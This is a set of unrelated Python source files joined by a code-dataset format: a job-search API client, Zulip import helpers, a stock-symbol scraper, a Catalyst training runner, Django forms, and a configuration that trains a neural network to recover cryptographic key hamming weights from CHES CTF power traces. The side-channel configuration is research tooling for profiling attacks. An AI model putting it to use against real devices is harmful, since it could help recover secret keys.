'DiskShareMount',
'Ethernet',
'EthernetSpeed',
'FibreChannel',
'GenericComponent',
'Memory',
'OperatingSystem',
'Processor',
'Software',
'SplunkUsage',
'Storage',
'DISK_PRODUCT_BLACKLIST',
'DISK_VENDOR_BLACKLIST',
'Database',
'DatabaseType',
'DeprecationKind',
'Device',
'DeviceEnvironment',
'DeviceModel',
'DeviceType',
'Connection',
'ConnectionType',
'LoadBalancerMember',
'LoadBalancerPool',
'LoadBalancerType',
'LoadBalancerVirtualServer',
'MarginKind',
'NetworkConnection',
'ReadOnlyDevice',
'SERIAL_BLACKLIST',
'ServiceCatalog',
'UptimeSupport',
'HistoryChange',
'DiscoveryValue',
'ASSET_NOT_REQUIRED',
]
# Load the plugins code
import ralph.discovery.plugins # noqa
|
the-stack_0_6226 | import os
from dotenv import find_dotenv, load_dotenv
import socket
from indeed import IndeedClient
import re
project_dir = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)
def get_ip():
return socket.gethostbyname(socket.gethostname())
# Set static user parameters
load_dotenv(find_dotenv())
indeed_pub_id = os.environ.get("INDEED_PUB_ID")
user_agent = os.environ.get("DEF_USER_AGENT")
static_params = {
'userip' : get_ip(),
'useragent' : user_agent
}
client = IndeedClient(indeed_pub_id)
# Script that pulls job search data using Indeed's api
def job_search(params):
# query and location parameters are required
if "q" not in params:
print("Please include query parameter")
return None
if "l" not in params:
print("Please include location parameter")
return None
params.update(static_params)
search_response = client.search(**params)
return search_response
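# Hedged usage sketch (hypothetical query values; a valid INDEED_PUB_ID and
# network access are required for a real call):
#   results = job_search({'q': 'data scientist', 'l': 'Chicago, IL'})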
def job_details(keys):
details_response = client.jobs(jobkeys = (keys))
return details_response
|
the-stack_0_6229 | import random
import requests
import shutil
import logging
import os
from typing import List, Dict, Any, Optional
from django.forms.models import model_to_dict
from zerver.models import Realm, RealmEmoji, Subscription, Recipient, \
Attachment, Stream, Message
from zerver.lib.actions import STREAM_ASSIGNMENT_COLORS as stream_colors
from zerver.lib.avatar_hash import user_avatar_path_from_ids
from zerver.lib.parallel import run_parallel
# stubs
ZerverFieldsT = Dict[str, Any]
def build_zerver_realm(realm_id: int, realm_subdomain: str, time: float,
other_product: str) -> List[ZerverFieldsT]:
realm = Realm(id=realm_id, date_created=time,
name=realm_subdomain, string_id=realm_subdomain,
description=("Organization imported from %s!" % (other_product)))
auth_methods = [[flag[0], flag[1]] for flag in realm.authentication_methods]
realm_dict = model_to_dict(realm, exclude='authentication_methods')
realm_dict['authentication_methods'] = auth_methods
    return [realm_dict]
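# Illustration (assumed argument values; requires a configured Zulip/Django
# environment): build_zerver_realm(1, 'acme', 1530000000.0, 'Slack') returns a
# single-element list holding the serialized Realm row, with its authentication
# methods expanded into [name, enabled] pairs.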
def build_avatar(zulip_user_id: int, realm_id: int, email: str, avatar_url: str,
timestamp: Any, avatar_list: List[ZerverFieldsT]) -> None:
avatar = dict(
path=avatar_url, # Save original avatar url here, which is downloaded later
realm_id=realm_id,
content_type=None,
user_profile_id=zulip_user_id,
last_modified=timestamp,
user_profile_email=email,
s3_path="",
size="")
avatar_list.append(avatar)
def build_subscription(recipient_id: int, user_id: int,
subscription_id: int) -> ZerverFieldsT:
subscription = Subscription(
color=random.choice(stream_colors),
id=subscription_id)
subscription_dict = model_to_dict(subscription, exclude=['user_profile', 'recipient_id'])
subscription_dict['user_profile'] = user_id
subscription_dict['recipient'] = recipient_id
return subscription_dict
def build_recipient(type_id: int, recipient_id: int, type: int) -> ZerverFieldsT:
recipient = Recipient(
type_id=type_id, # stream id
id=recipient_id,
type=type)
recipient_dict = model_to_dict(recipient)
return recipient_dict
def build_realm(zerver_realm: List[ZerverFieldsT], realm_id: int,
domain_name: str) -> ZerverFieldsT:
realm = dict(zerver_client=[{"name": "populate_db", "id": 1},
{"name": "website", "id": 2},
{"name": "API", "id": 3}],
zerver_customprofilefield=[],
zerver_customprofilefieldvalue=[],
zerver_userpresence=[], # shows last logged in data, which is not available
zerver_userprofile_mirrordummy=[],
zerver_realmdomain=[{"realm": realm_id,
"allow_subdomains": False,
"domain": domain_name,
"id": realm_id}],
zerver_useractivity=[],
zerver_realm=zerver_realm,
zerver_huddle=[],
zerver_userprofile_crossrealm=[],
zerver_useractivityinterval=[],
zerver_reaction=[],
zerver_realmemoji=[],
zerver_realmfilter=[])
return realm
def build_usermessages(zerver_usermessage: List[ZerverFieldsT], usermessage_id: int,
zerver_subscription: List[ZerverFieldsT], recipient_id: int,
mentioned_users_id: List[int], message_id: int) -> int:
for subscription in zerver_subscription:
if subscription['recipient'] == recipient_id:
flags_mask = 1 # For read
if subscription['user_profile'] in mentioned_users_id:
flags_mask = 9 # For read and mentioned
usermessage = dict(
user_profile=subscription['user_profile'],
id=usermessage_id,
flags_mask=flags_mask,
message=message_id)
usermessage_id += 1
zerver_usermessage.append(usermessage)
return usermessage_id
def build_defaultstream(realm_id: int, stream_id: int,
defaultstream_id: int) -> ZerverFieldsT:
defaultstream = dict(
stream=stream_id,
realm=realm_id,
id=defaultstream_id)
return defaultstream
def build_stream(date_created: Any, realm_id: int, name: str,
description: str, stream_id: int, deactivated: bool=False,
invite_only: bool=False) -> ZerverFieldsT:
stream = Stream(
name=name,
deactivated=deactivated,
description=description,
date_created=date_created,
invite_only=invite_only,
id=stream_id)
stream_dict = model_to_dict(stream,
exclude=['realm'])
stream_dict['realm'] = realm_id
return stream_dict
def build_message(subject: str, pub_date: float, message_id: int, content: str,
rendered_content: Optional[str], user_id: int, recipient_id: int,
has_image: bool=False, has_link: bool=False,
has_attachment: bool=True) -> ZerverFieldsT:
zulip_message = Message(
rendered_content_version=1, # this is Zulip specific
subject=subject,
pub_date=pub_date,
id=message_id,
content=content,
rendered_content=rendered_content,
has_image=has_image,
has_attachment=has_attachment,
has_link=has_link)
zulip_message_dict = model_to_dict(zulip_message,
exclude=['recipient', 'sender', 'sending_client'])
zulip_message_dict['sender'] = user_id
zulip_message_dict['sending_client'] = 1
zulip_message_dict['recipient'] = recipient_id
return zulip_message_dict
def build_attachment(realm_id: int, message_id: int, attachment_id: int,
user_id: int, fileinfo: ZerverFieldsT, s3_path: str,
zerver_attachment: List[ZerverFieldsT]) -> None:
"""
This function should be passed a 'fileinfo' dictionary, which contains
information about 'size', 'created' (created time) and ['name'] (filename).
"""
attachment = Attachment(
id=attachment_id,
size=fileinfo['size'],
create_time=fileinfo['created'],
is_realm_public=True,
path_id=s3_path,
file_name=fileinfo['name'])
attachment_dict = model_to_dict(attachment,
exclude=['owner', 'messages', 'realm'])
attachment_dict['owner'] = user_id
attachment_dict['messages'] = [message_id]
attachment_dict['realm'] = realm_id
zerver_attachment.append(attachment_dict)
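# Illustration of the 'fileinfo' mapping expected above (assumed values only):
#   fileinfo = {'size': 4096, 'created': 1530000000.0, 'name': 'notes.txt'}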
def process_avatars(avatar_list: List[ZerverFieldsT], avatar_dir: str, realm_id: int,
threads: int, size_url_suffix: str='') -> List[ZerverFieldsT]:
"""
This function gets the avatar of the user and saves it in the
user's avatar directory with both the extensions '.png' and '.original'
Required parameters:
1. avatar_list: List of avatars to be mapped in avatars records.json file
2. avatar_dir: Folder where the downloaded avatars are saved
3. realm_id: Realm ID.
"""
def get_avatar(avatar_upload_list: List[str]) -> int:
avatar_url = avatar_upload_list[0]
image_path = avatar_upload_list[1]
original_image_path = avatar_upload_list[2]
response = requests.get(avatar_url + size_url_suffix, stream=True)
with open(image_path, 'wb') as image_file:
shutil.copyfileobj(response.raw, image_file)
shutil.copy(image_path, original_image_path)
return 0
logging.info('######### GETTING AVATARS #########\n')
logging.info('DOWNLOADING AVATARS .......\n')
avatar_original_list = []
avatar_upload_list = []
for avatar in avatar_list:
avatar_hash = user_avatar_path_from_ids(avatar['user_profile_id'], realm_id)
avatar_url = avatar['path']
avatar_original = dict(avatar)
image_path = ('%s/%s.png' % (avatar_dir, avatar_hash))
original_image_path = ('%s/%s.original' % (avatar_dir, avatar_hash))
avatar_upload_list.append([avatar_url, image_path, original_image_path])
# We don't add the size field here in avatar's records.json,
# since the metadata is not needed on the import end, and we
# don't have it until we've downloaded the files anyway.
avatar['path'] = image_path
avatar['s3_path'] = image_path
avatar_original['path'] = original_image_path
avatar_original['s3_path'] = original_image_path
avatar_original_list.append(avatar_original)
    # Run downloads in parallel
output = []
for (status, job) in run_parallel(get_avatar, avatar_upload_list, threads=threads):
output.append(job)
logging.info('######### GETTING AVATARS FINISHED #########\n')
return avatar_list + avatar_original_list
def process_uploads(upload_list: List[ZerverFieldsT], upload_dir: str,
threads: int) -> List[ZerverFieldsT]:
"""
This function downloads the uploads and saves it in the realm's upload directory.
Required parameters:
1. upload_list: List of uploads to be mapped in uploads records.json file
2. upload_dir: Folder where the downloaded uploads are saved
"""
def get_uploads(upload: List[str]) -> int:
upload_url = upload[0]
upload_path = upload[1]
upload_path = os.path.join(upload_dir, upload_path)
response = requests.get(upload_url, stream=True)
os.makedirs(os.path.dirname(upload_path), exist_ok=True)
with open(upload_path, 'wb') as upload_file:
shutil.copyfileobj(response.raw, upload_file)
return 0
logging.info('######### GETTING ATTACHMENTS #########\n')
logging.info('DOWNLOADING ATTACHMENTS .......\n')
upload_url_list = []
for upload in upload_list:
upload_url = upload['path']
upload_s3_path = upload['s3_path']
upload_url_list.append([upload_url, upload_s3_path])
upload['path'] = upload_s3_path
    # Run downloads in parallel
output = []
for (status, job) in run_parallel(get_uploads, upload_url_list, threads=threads):
output.append(job)
logging.info('######### GETTING ATTACHMENTS FINISHED #########\n')
return upload_list
def process_emojis(zerver_realmemoji: List[ZerverFieldsT], emoji_dir: str,
emoji_url_map: ZerverFieldsT, threads: int) -> List[ZerverFieldsT]:
"""
This function downloads the custom emojis and saves in the output emoji folder.
Required parameters:
1. zerver_realmemoji: List of all RealmEmoji objects to be imported
2. emoji_dir: Folder where the downloaded emojis are saved
3. emoji_url_map: Maps emoji name to its url
"""
def get_emojis(upload: List[str]) -> int:
emoji_url = upload[0]
emoji_path = upload[1]
upload_emoji_path = os.path.join(emoji_dir, emoji_path)
response = requests.get(emoji_url, stream=True)
os.makedirs(os.path.dirname(upload_emoji_path), exist_ok=True)
with open(upload_emoji_path, 'wb') as emoji_file:
shutil.copyfileobj(response.raw, emoji_file)
return 0
emoji_records = []
upload_emoji_list = []
logging.info('######### GETTING EMOJIS #########\n')
logging.info('DOWNLOADING EMOJIS .......\n')
for emoji in zerver_realmemoji:
emoji_url = emoji_url_map[emoji['name']]
emoji_path = RealmEmoji.PATH_ID_TEMPLATE.format(
realm_id=emoji['realm'],
emoji_file_name=emoji['name'])
upload_emoji_list.append([emoji_url, emoji_path])
emoji_record = dict(emoji)
emoji_record['path'] = emoji_path
emoji_record['s3_path'] = emoji_path
emoji_record['realm_id'] = emoji_record['realm']
emoji_record.pop('realm')
emoji_records.append(emoji_record)
    # Run downloads in parallel
output = []
for (status, job) in run_parallel(get_emojis, upload_emoji_list, threads=threads):
output.append(job)
logging.info('######### GETTING EMOJIS FINISHED #########\n')
return emoji_records
|
the-stack_0_6232 | '''
Created on Jul 25, 2017
@author: Daniel Sela, Arnon Sela
'''
def sixty(scalar, trailsign=False, ):
'''
;+
; NAME:
; SIXTY()
; PURPOSE:
; Converts a decimal number to sexagesimal.
; EXPLANATION:
; Reverse of the TEN() function.
;
; CALLING SEQUENCE:
; X = SIXTY( SCALAR, [ /TrailSign ] )
;
; INPUTS:
; SCALAR -- Decimal quantity.
; OUTPUTS:
; Function value returned = real vector of three elements,
; sexagesimal equivalent of input decimal quantity. Double
; precision if the input is double, otherwise floating point.
; By default, a negative number is signified by making the first non-zero
; element of the output vection negative, but this can be modified with
; the /TrailSign keyword.
;
; OPTIONAL INPUT KEYWORD:
; /TrailSign - By default, SIXTY() returns a negative sign in the first
; nonzero element. If /TrailSign is set, then SIXTY() will return
; always return a negative sign in the first element, even if it is
; zero
; PROCEDURE:
; Mostly involves checking arguments and setting the sign.
;
; EXAMPLE:
; If x = -0.345d then sixty(x) = [0.0, -20.0, 42.0]
; and sixty(x,True) = [-0.0, 20.0, 42.0]
;-
Changes History:
Added dd range limit - force positive value by complementing to dd_range
prevent adding negative sign to value of 0
'''
if not isinstance(scalar, float):
scalar = float(scalar)
ss = abs(3600.0*scalar)
mm = abs(60.0*scalar)
dd = abs(scalar)
result = [0, 0, 0]
result[0] = int(dd)
result[1] = int(mm-60.0*result[0])
result[2] = ss-3600.0*result[0] - 60.0*result[1]
if scalar < 0:
if trailsign:
result[0] = -result[0]
else:
if result[0] != 0:
result[0] = -result[0]
elif result[1] != 0:
result[1] = -result[1]
elif result[2] != 0:
result[2] = -result[2]
return result
if __name__ == '__main__':
import unittest
from astropy.coordinates import Angle
from astropy import units as u
class TestSixtyMethod(unittest.TestCase):
def test_1(self):
self.assertEqual(sixty(-0.5), [0, -30, 0.0])
def test_2(self):
self.assertEqual(sixty(0.5), [0, 30, 0.0])
def test_3(self):
self.assertEqual(sixty(10.49999), [10, 29, 59.96399999999994])
def test_4(self):
dms = Angle(-0.5, unit=u.deg).dms
result = list(dms._asdict().values())
self.assertEqual(result, [-0.0, -30.0, -0.0])
unittest.main()
|
the-stack_0_6233 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 18 22:18:27 2021
@author: galin
"""
import string
import requests
from bs4 import BeautifulSoup
import pandas as pd
import time
from tqdm.auto import tqdm
# stock exchange :
# AMEX - American Stock Exchange,
# LSE - London Stock Exchange,
# NASDAQ - NASDAQ Stock Exchange,
# NYSE - New York Stock Exchange,
# SGX - Singapore Stock Exchange
# TSX - Toronto Stock Exchange
def get_indexes (stocks_exchange):
def get_stock_indexes(stock_exchange_name):
base_url="http://eoddata.com/stocklist"
letters_upper_case = list(string.ascii_uppercase)
digits = [x for x in range(10)]
if stock_exchange_name in ['LSE', 'SGX']:
symbols_tabs = digits + letters_upper_case
else:
symbols_tabs = letters_upper_case
df_index_description = pd.DataFrame({'Code':[],
'Name':[]})
urls = [base_url + "/{}/{}.htm".format(stock_exchange_name, letter)
for letter in symbols_tabs ]
html_contents = (requests.get(url).text for url in urls)
with tqdm(total=len(urls)) as pbar:
for html_content in html_contents:
soup = BeautifulSoup(html_content, "lxml")
tables = soup.find_all(lambda tag: tag.name=='table')
read_table = pd.read_html(str(tables[5]))
temp = read_table[0][['Code','Name']]
if(set(temp['Code']).isdisjoint(set(df_index_description['Code']))):
df_index_description = pd.concat([df_index_description
, read_table[0][['Code','Name']]
])
time.sleep(1)
pbar.update(1)
return df_index_description['Code']
df_index_description = pd.DataFrame()
for stocks in stocks_exchange:
df_index_description = pd.concat([df_index_description
, get_stock_indexes(stocks)])
return df_index_description[0].tolist()
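# Hedged usage sketch (network access to eoddata.com is required; exchange
# codes as listed in the comment above):
#   nasdaq_codes = get_indexes(['NASDAQ'])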
|
the-stack_0_6238 | import os
from click import echo
from tmt.steps.provision.base import ProvisionBase
from tmt.utils import SpecificationError
class ProvisionLocalhost(ProvisionBase):
""" Localhost provisioner """
def __init__(self, data, step):
super(ProvisionLocalhost, self).__init__(data, step)
self._prepare_map = {
'ansible': self._prepare_ansible,
'shell': self._prepare_shell,
}
def execute(self, *args, **kwargs):
self.run(self.join(args))
def _prepare_ansible(self, what):
""" Run ansible on localhost """
# Playbook paths should be relative to the metadata tree root
playbook = os.path.join(self.step.plan.run.tree.root, what)
# Prepare verbose level based on the --debug option count
verbose = ' -' + self.opt('debug') * 'v' if self.opt('debug') else ''
# Run ansible playbook against localhost, in verbose mode
ansible = (
f'ansible-playbook{verbose} -c local -i localhost, {playbook}')
# Force column width to 80 chars, to mitigate issues with too long
# lines due to indent. Column width is the same as with libvirt plugin.
columns = 'stty cols 80'
self.run(f'sudo sh -c "{columns}; {ansible}"')
def _prepare_shell(self, what):
""" Run ansible on localhost """
# Set current working directory to the test metadata root
self.run(what, cwd=self.step.plan.run.tree.root)
def prepare(self, how, what):
""" Run prepare phase """
try:
self._prepare_map[how](what)
        except KeyError:
raise SpecificationError(
f"Prepare method '{how}' is not supported.")
|
the-stack_0_6239 | from typing import ( # isort:skip
Any, Callable, Dict, Mapping, Optional, Tuple, Union # isort:skip
) # isort:skip
from abc import ABC, abstractmethod
from collections import OrderedDict
import torch
from torch import nn
from torch.utils.data import DataLoader, DistributedSampler
from catalyst import utils
from catalyst.utils.tools.typing import (
Criterion, Device, Model, Optimizer, Scheduler
)
from .callback import Callback, LoggerCallback
from .experiment import _Experiment
from .state import _State
class _Runner(ABC):
"""
Abstract class for all runners inherited from
"""
experiment_fn: Callable = _Experiment
state_fn: callable = _State
def __init__(
self,
model: Model = None,
device: Device = None,
):
"""
Args:
model (Model): Torch model object
device (Device): Torch device
"""
# main
self._model: Model = model
self._device: Device = device
self.experiment: _Experiment = None
self.state: _State = None
self.callbacks: OrderedDict[str, Callback] = None
self.loggers: OrderedDict[str, LoggerCallback] = None
self.loaders: OrderedDict[str, DataLoader] = None
# additional
self._check_run = False
@property
def model(self) -> Model:
"""
Returns the runner's model instance
"""
return self._model
@model.setter
def model(self, value: Union[Model, Dict[str, Model]]):
"""
        Setter for the runner's model
"""
if isinstance(value, nn.Module):
model = value
elif isinstance(value, dict):
values_are_models = all(
[isinstance(v, nn.Module) for v in value.values()]
)
if not values_are_models:
raise TypeError(
"Invalid dict value type, must be `torch.nn.Module`"
)
model = value
else:
raise TypeError(
f"Invalid value type "
f"must be `torch.nn.Module` or `Dict[str, torch.nn.Module]` "
f"got '{type(value)}'"
)
if self._device is not None:
model: Model = utils.maybe_recursive_call(
model, "to", device=self._device
)
self._model = model
@property
def device(self) -> Device:
"""
Returns the runner's device instance
"""
return self._device
@device.setter
def device(self, value: Device):
"""
        Setter for the runner's device
"""
if isinstance(value, (str, torch.device)):
self._device = value
else:
raise TypeError(
f"Invalid value type "
f"must be `str` or `torch.device` "
f"got '{type(value)}'"
)
if self._model is not None:
self._model = utils.maybe_recursive_call(
self._model, "to", device=self._device
)
@abstractmethod
def forward(self, batch: Mapping[str, Any], **kwargs) -> Mapping[str, Any]:
"""
Forward method for your Runner
Args:
batch: Key-value batch items
**kwargs: kwargs to pass to the model
"""
pass
def _get_experiment_components(
self, stage: str = None
) -> Tuple[Model, Criterion, Optimizer, Scheduler, Device]:
"""
Inner method for children's classes for model specific initialization.
As baseline, checks device support and puts model on it.
:return:
"""
utils.set_global_seed(self.experiment.initial_seed)
model = self.experiment.get_model(stage)
criterion, optimizer, scheduler = \
self.experiment.get_experiment_components(model, stage)
model, criterion, optimizer, scheduler, device = \
utils.process_components(
model=model,
criterion=criterion,
optimizer=optimizer,
scheduler=scheduler,
distributed_params=self.experiment.distributed_params,
device=self.device
)
return model, criterion, optimizer, scheduler, device
def _prepare_for_stage(self, stage: str):
utils.set_global_seed(self.experiment.initial_seed)
migrating_params = {}
if self.state is not None:
migrating_params.update(
{
"step": self.state.step,
"epoch": self.state.epoch
}
)
utils.set_global_seed(self.experiment.initial_seed)
self.model, criterion, optimizer, scheduler, self.device = \
self._get_experiment_components(stage)
utils.set_global_seed(self.experiment.initial_seed)
self.state = self.state_fn(
stage=stage,
model=self.model,
device=self.device,
criterion=criterion,
optimizer=optimizer,
scheduler=scheduler,
**self.experiment.get_state_params(stage),
**migrating_params
)
utils.set_global_seed(self.experiment.initial_seed)
callbacks = self.experiment.get_callbacks(stage)
loggers = utils.process_callbacks(
OrderedDict(
[
(k, v) for k, v in callbacks.items()
if isinstance(v, LoggerCallback)
]
)
)
callbacks = utils.process_callbacks(
OrderedDict(
[
(k, v) for k, v in callbacks.items()
if not isinstance(v, LoggerCallback)
]
)
)
self.state.loggers = loggers
self.loggers = loggers
self.callbacks = callbacks
def _prepare_for_epoch(self, stage: str, epoch: int):
pass
# @TODO: too complicated -> rewrite
def _run_event(self, event: str, moment: Optional[str]):
fn_name = f"on_{event}"
if moment is not None:
fn_name = f"{fn_name}_{moment}"
# before callbacks
if self.state is not None:
getattr(self.state, f"{fn_name}_pre")()
if self.loggers is not None and moment == "start":
for logger in self.loggers.values():
getattr(logger, fn_name)(self.state)
# running callbacks
if self.callbacks is not None:
for callback in self.callbacks.values():
getattr(callback, fn_name)(self.state)
# after callbacks
if self.loggers is not None and \
(moment == "end" or moment is None): # for on_exception case
for logger in self.loggers.values():
getattr(logger, fn_name)(self.state)
if self.state is not None:
getattr(self.state, f"{fn_name}_post")()
def _batch2device(self, batch: Mapping[str, Any], device: Device):
output = utils.any2device(batch, device)
return output
def _run_batch_train_step(self, batch: Mapping[str, Any]):
self.state.output = self.forward(batch)
@torch.no_grad()
def predict_batch(
self, batch: Mapping[str, Any], **kwargs
) -> Mapping[str, Any]:
"""
Run model for a batch of elements
WARN: You should not override this method. If you need specific model
call, override forward() method
Args:
batch: Key-value batch items
**kwargs: kwargs to pass to the model
Returns:
model output key-value
"""
batch = self._batch2device(batch, self.device)
output = self.forward(batch, **kwargs)
return output
def _run_batch(self, batch: Mapping[str, Any]):
self.state.step += self.state.batch_size
batch = self._batch2device(batch, self.device)
self.state.input = batch
self.state.timer.stop("_timers/data_time")
self._run_event("batch", moment="start")
self.state.timer.start("_timers/model_time")
self._run_batch_train_step(batch=batch)
self.state.timer.stop("_timers/model_time")
self.state.timer.stop("_timers/batch_time")
self._run_event("batch", moment="end")
def _run_loader(self, loader: DataLoader):
self.state.batch_size = (
loader.batch_sampler.batch_size
if loader.batch_sampler is not None else loader.batch_size
)
self.state.step = (
self.state.step
or self.state.epoch * len(loader) * self.state.batch_size
)
# @TODO: remove time usage, use it under the hood
self.state.timer.reset()
self.state.timer.start("_timers/batch_time")
self.state.timer.start("_timers/data_time")
for i, batch in enumerate(loader):
self._run_batch(batch)
self.state.timer.reset()
if self._check_run and i >= 2:
break
self.state.timer.start("_timers/batch_time")
self.state.timer.start("_timers/data_time")
def _run_epoch(self, stage: str, epoch: int):
self._prepare_for_epoch(stage=stage, epoch=epoch)
assert self.loaders is not None
loaders = self.loaders
# @TODO: better solution with train/inference handling ?
if not self.state.stage.startswith("infer"):
assert self.state.valid_loader in loaders.keys(), \
f"'{self.state.valid_loader}' " \
f"should be in provided loaders: {list(loaders.keys())}"
else:
assert not any(x.startswith("train") for x in loaders.keys()), \
"for inference no train loader should be passed"
for loader_name, loader in loaders.items():
self.state.loader_name = loader_name
self.state.loader_len = len(loader)
self.state.need_backward = loader_name.startswith("train")
self.model.train(self.state.need_backward)
if isinstance(loader.sampler, DistributedSampler) \
and loader_name.startswith("train"):
loader.sampler.set_epoch(self.state.stage_epoch)
utils.set_global_seed(
self.experiment.initial_seed + self.state.epoch + 1
)
self._run_event("loader", moment="start")
with torch.set_grad_enabled(self.state.need_backward):
self._run_loader(loader)
self._run_event("loader", moment="end")
def _run_stage(self, stage: str):
self._prepare_for_stage(stage)
self._run_event("stage", moment="start")
for epoch in range(self.state.num_epochs):
self.state.stage_epoch = epoch
self._run_event("epoch", moment="start")
self._run_epoch(stage=stage, epoch=epoch)
self._run_event("epoch", moment="end")
if self._check_run and self.state.stage_epoch >= 2:
break
if self.state.early_stop:
self.state.early_stop = False
break
self.state.epoch += 1
self._run_event("stage", moment="end")
def run_experiment(self, experiment: _Experiment, check: bool = False):
"""
Starts the experiment
"""
self._check_run = check
self.experiment = experiment
# jupyter source code logging hack
# + hack to prevent cycle imports
# @TODO: remove hack to catalyst.dl only, not core
# from catalyst.dl.experiment import BaseExperiment
# if isinstance(self.experiment, BaseExperiment) \
# and self.experiment.logdir is not None:
# expdir = Path(os.getcwd())
# logdir = Path(self.experiment.logdir)
# utils.dump_base_experiment_code(expdir, logdir)
try:
for stage in self.experiment.stages:
self._run_stage(stage)
except (Exception, KeyboardInterrupt) as ex:
# if an exception had been raised
# before the exception-handlers were initialized
if self.loggers is None or self.callbacks is None:
raise ex
else:
self.state.exception = ex
self._run_event("exception", moment=None)
return self
__all__ = ["_Runner"]
|
the-stack_0_6240 | from sklearn import preprocessing
from . import state_space_parameters as ssp
import countermeasures.data_loader as data_loader
import numpy as np
import tensorflow as tf
MODEL_NAME = 'CHES_CTF_HW'
# Number of output neurons
NUM_CLASSES = 9 # Number of output neurons
# Input Size
INPUT_SIZE = 2200
# Batch Queue parameters
TRAIN_BATCH_SIZE = 400 # Batch size for training (scaled linearly with number of gpus used)
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 45000 # Number of training examples
VALIDATION_FROM_ATTACK_SET = True
EVAL_BATCH_SIZE = TRAIN_BATCH_SIZE # Batch size for validation
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 2500 # Number of validation examples
MAX_EPOCHS = 50 # Max number of epochs to train model
# Training Parameters
OPTIMIZER = 'Adam' # Optimizer (should be in caffe format string)
MAX_LR = 5e-3 # The max LR (scaled linearly with number of gpus used)
# Bulk data folder
BULK_ROOT = '/tudelft.net/staff-bulk/ewi/insy/CYS/spicek/jrijsdijk/rl-paper/CHES_CTF/cm_experiment_hw/'
DATA_ROOT = BULK_ROOT + '../data/'
# Trained model dir
TRAINED_MODEL_DIR = BULK_ROOT + 'trained_models'
DB_FILE = DATA_ROOT + 'ches_ctf.h5'
(TRAIN_TRACES, TRAIN_DATA), (ATTACK_TRACES, ATTACK_DATA) = data_loader.load_ches_hd5(
DB_FILE,
'/Profiling_traces/traces', '/Profiling_traces/metadata',
'/Attack_traces/traces', '/Attack_traces/metadata'
)
TRAIN_LABELS = np.array([bin(x).count("1") for x in np.load(DATA_ROOT + 'train_labels.npy')])
ATTACK_LABELS = np.array([bin(x).count("1") for x in np.load(DATA_ROOT + 'attack_labels.npy')])
NOISE_SCALE = data_loader.get_noise_scale(TRAIN_TRACES)
USE_OCLR = True
MODEL_PREPROCESSING = [
preprocessing.StandardScaler()
]
MODEL_LAYERS = [
tf.keras.layers.Conv1D(4, 100, kernel_initializer='he_uniform', activation='selu', padding='same'),
tf.keras.layers.AveragePooling1D(4, strides=4),
tf.keras.layers.Flatten(name='flatten'),
tf.keras.layers.Dense(15, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(10, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(10, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
KEY = np.load(DATA_ROOT + 'attack_key.npy')
ATTACK_KEY_BYTE = 0
ATTACK_PRECOMPUTED_BYTE_VALUES = np.array(
[[bin(x).count("1") for x in row] for row in
np.load(DATA_ROOT + f'attack_precomputed_byte{ATTACK_KEY_BYTE}_values.npy')]
)
TRACES_PER_ATTACK = 2000 # Maximum number of traces to use per attack
NUM_ATTACKS = 100 # Number of attacks to average the GE over
|
the-stack_0_6241 | """Copyright (c) 2018 Great Ormond Street Hospital for Children NHS Foundation
Trust & Birmingham Women's and Children's NHS Foundation Trust
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from datetime import datetime
from django import forms
from django.contrib.auth.models import User
from django.forms import HiddenInput, Textarea, CheckboxInput, Select, ModelChoiceField
from django.forms import BaseFormSet
from .models import *
class UserForm(forms.ModelForm):
"""
User registration form
"""
password = forms.CharField(widget=forms.PasswordInput())
role_choices = (('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff'))
role = forms.ChoiceField(choices=role_choices)
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class Meta:
model = User
fields = ('first_name', 'last_name', 'email', 'password')
class ProfileForm(forms.Form):
"""
Allows users to change their info.
    TODO - Remove this as it could be a security risk if 2 permission layers are introduced
"""
role_choices = (('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff'),
('Unknown', 'Unknown'),)
role = forms.ChoiceField(choices=role_choices, required=False)
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class ProbandForm(forms.ModelForm):
'''
    Form used for allowing users to edit proband information
'''
class Meta:
model = Proband
fields = ['outcome', 'comment']
widgets = {
'outcome': Textarea(attrs={'rows': '3'}),
'comment': Textarea(attrs={'rows': '3'}),
}
class VariantValidationForm(forms.ModelForm):
"""
Form used to change values used for variant validation tracking.
"""
def __init__(self, *args, **kwargs):
super(VariantValidationForm, self).__init__(*args, **kwargs)
self.fields['validation_responsible_user'].required=False
class Meta:
model = ProbandVariant
fields = [
'validation_status',
'validation_responsible_user',
]
class AddCommentForm(forms.ModelForm):
'''
Adds a new CaseComment in the Proband page
'''
class Meta:
model = CaseComment
fields = ['comment']
